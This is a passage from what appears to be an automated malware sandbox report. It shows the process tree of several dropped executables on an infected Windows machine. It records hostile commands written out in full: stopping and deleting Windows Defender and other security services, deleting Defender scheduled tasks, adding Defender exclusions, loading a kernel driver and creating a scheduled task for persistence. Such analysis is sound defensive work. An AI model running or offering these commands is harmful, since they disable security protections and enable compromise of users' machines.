                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                  11⤵
                                                    PID:2156
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1896
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4616
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                    11⤵
                                                      PID:3568
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:3992
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:4088
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                      11⤵
                                                        PID:2860
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:2644
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:1348
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                        11⤵
                                                          PID:1176
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecFlt"
                                                          11⤵
                                                            PID:4872
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "MsSecFlt"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:768
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                            11⤵
                                                              PID:4632
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:3112
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:376
                                                            • C:\Windows\system32\reg.exe
                                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                              11⤵
                                                                PID:3292
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                11⤵
                                                                  PID:3588
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                  11⤵
                                                                    PID:1712
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                    11⤵
                                                                      PID:1700
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                      11⤵
                                                                        PID:3552
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc stop ddrver
                                                                        11⤵
                                                                        • Launches sc.exe
                                                                        PID:732
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc delete ddrver
                                                                        11⤵
                                                                        • Launches sc.exe
                                                                        PID:2076
                                                            • C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"
                                                              6⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2268
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
                                                                7⤵
                                                                • Enumerates connected drives
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:1200
                                                            • C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:2244
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe /c 67e8f4de3ad1d.vbs
                                                                7⤵
                                                                • Checks computer location settings
                                                                • Modifies registry class
                                                                PID:3108
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                                                                  8⤵
                                                                    PID:220
                                                              • C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"
                                                                6⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1780
                                                                • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                  7⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:676
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\43EA.tmp\43EB.tmp\43EC.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                    8⤵
                                                                      PID:416
                                                                      • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                                                                        9⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2372
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4467.tmp\4468.tmp\4469.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                                                                          10⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:3028
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                            11⤵
                                                                            • Launches sc.exe
                                                                            PID:4308
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc start ddrver
                                                                            11⤵
                                                                            • Launches sc.exe
                                                                            PID:4904
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 1
                                                                            11⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:2220
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc stop ddrver
                                                                            11⤵
                                                                            • Launches sc.exe
                                                                            PID:2076
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc start ddrver
                                                                            11⤵
                                                                            • Launches sc.exe
                                                                            PID:1288
                                                                          • C:\Windows\system32\takeown.exe
                                                                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                            11⤵
                                                                            • Possible privilege escalation attempt
                                                                            • Modifies file permissions
                                                                            PID:4372
                                                                          • C:\Windows\system32\icacls.exe
                                                                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                            11⤵
                                                                            • Possible privilege escalation attempt
                                                                            • Modifies file permissions
                                                                            PID:2860
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc stop "WinDefend"
                                                                            11⤵
                                                                            • Launches sc.exe
                                                                            PID:4628
                                                                          • C:\Windows\system32\sc.exe
                                                                            sc delete "WinDefend"
                                                                            11⤵
                                                                              PID:4968
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                              11⤵
                                                                                PID:4876
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop "MDCoreSvc"
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2352
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc delete "MDCoreSvc"
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:5072
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                11⤵
                                                                                  PID:3164
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc stop "WdNisSvc"
                                                                                  11⤵
                                                                                    PID:3036
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc delete "WdNisSvc"
                                                                                    11⤵
                                                                                    • Launches sc.exe
                                                                                    PID:1500
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                    11⤵
                                                                                      PID:3740
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      sc stop "Sense"
                                                                                      11⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1780
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      sc delete "Sense"
                                                                                      11⤵
                                                                                      • Launches sc.exe
                                                                                      PID:404
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                      11⤵
                                                                                        PID:3272
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop "wscsvc"
                                                                                        11⤵
                                                                                          PID:3508
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc delete "wscsvc"
                                                                                          11⤵
                                                                                          • Launches sc.exe
                                                                                          PID:1896
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                          11⤵
                                                                                            PID:3708
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc stop "SgrmBroker"
                                                                                            11⤵
                                                                                            • Launches sc.exe
                                                                                            PID:5080
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc delete "SgrmBroker"
                                                                                            11⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1784
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                            11⤵
                                                                                              PID:2004
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc stop "SecurityHealthService"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2268
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc delete "SecurityHealthService"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:4904
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                              11⤵
                                                                                                PID:2944
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop "webthreatdefsvc"
                                                                                                11⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3220
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc delete "webthreatdefsvc"
                                                                                                11⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4560
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                11⤵
                                                                                                  PID:4372
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc stop "webthreatdefusersvc"
                                                                                                  11⤵
                                                                                                    PID:2860
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc delete "webthreatdefusersvc"
                                                                                                    11⤵
                                                                                                      PID:2788
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                      11⤵
                                                                                                        PID:4968
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc stop "WdNisDrv"
                                                                                                        11⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:2172
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc delete "WdNisDrv"
                                                                                                        11⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:1456
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                        11⤵
                                                                                                          PID:1808
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc stop "WdBoot"
                                                                                                          11⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:2196
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc delete "WdBoot"
                                                                                                          11⤵
                                                                                                            PID:540
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                            11⤵
                                                                                                              PID:2364
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc stop "WdFilter"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:1596
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc delete "WdFilter"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:1496
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                              11⤵
                                                                                                                PID:1520
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "SgrmAgent"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:4520
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc delete "SgrmAgent"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1896
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                11⤵
                                                                                                                  PID:3708
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc stop "MsSecWfp"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:5080
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc delete "MsSecWfp"
                                                                                                                  11⤵
                                                                                                                    PID:1784
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                    11⤵
                                                                                                                      PID:2004
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop "MsSecFlt"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:2268
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc delete "MsSecFlt"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3212
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                      11⤵
                                                                                                                        PID:3112
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "MsSecCore"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2856
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "MsSecCore"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3728
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                        11⤵
                                                                                                                          PID:2340
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                          11⤵
                                                                                                                            PID:4476
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                            11⤵
                                                                                                                              PID:1700
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                              11⤵
                                                                                                                                PID:3612
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                11⤵
                                                                                                                                  PID:4700
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:3636
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc delete ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1048
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"
                                                                                                                        6⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2804
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                          7⤵
                                                                                                                          • Downloads MZ/PE file
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4904
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:3612
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              9⤵
                                                                                                                                PID:5000
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                9⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2104
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1824
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:4184
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:1500
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  9⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:3764
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:5304
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-6RF02.tmp\Bell_Setup16.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-6RF02.tmp\Bell_Setup16.tmp" /SL5="$1A004C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                  9⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5336
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5396
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8MGIB.tmp\Bell_Setup16.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8MGIB.tmp\Bell_Setup16.tmp" /SL5="$801C8,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                                                                                      11⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:5440
                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                                                                                                                                        12⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:5512
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                                                                                                          13⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5548
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
                                                                                                                                          "PowerShell.exe" -NoProfile -NonInteractive -Command -
                                                                                                                                          13⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6024
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
                                                                                                                                          13⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2208
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1544
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                                  9⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:1824
                                                                                                                                • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5304
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                                                                    10⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:5440
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10045200101\0070c4682b.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10045200101\0070c4682b.exe"
                                                                                                                                8⤵
                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:5000
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045200101\0070c4682b.exe"
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:6416
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10045210101\e9ea3a76fa.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10045210101\e9ea3a76fa.exe"
                                                                                                                                8⤵
                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:5776
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045210101\e9ea3a76fa.exe"
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:7000
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10045220101\eff3995a8d.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10045220101\eff3995a8d.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4336
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10380550101\13027cecb5.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10380550101\13027cecb5.exe"
                                                                                                                            6⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:3940
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"
                                                                                                                            6⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Drops startup file
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:676
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'
                                                                                                                              7⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:3188
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'
                                                                                                                              7⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:3956
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'
                                                                                                                              7⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4916
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'
                                                                                                                              7⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:2312
                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"
                                                                                                                              7⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:4024
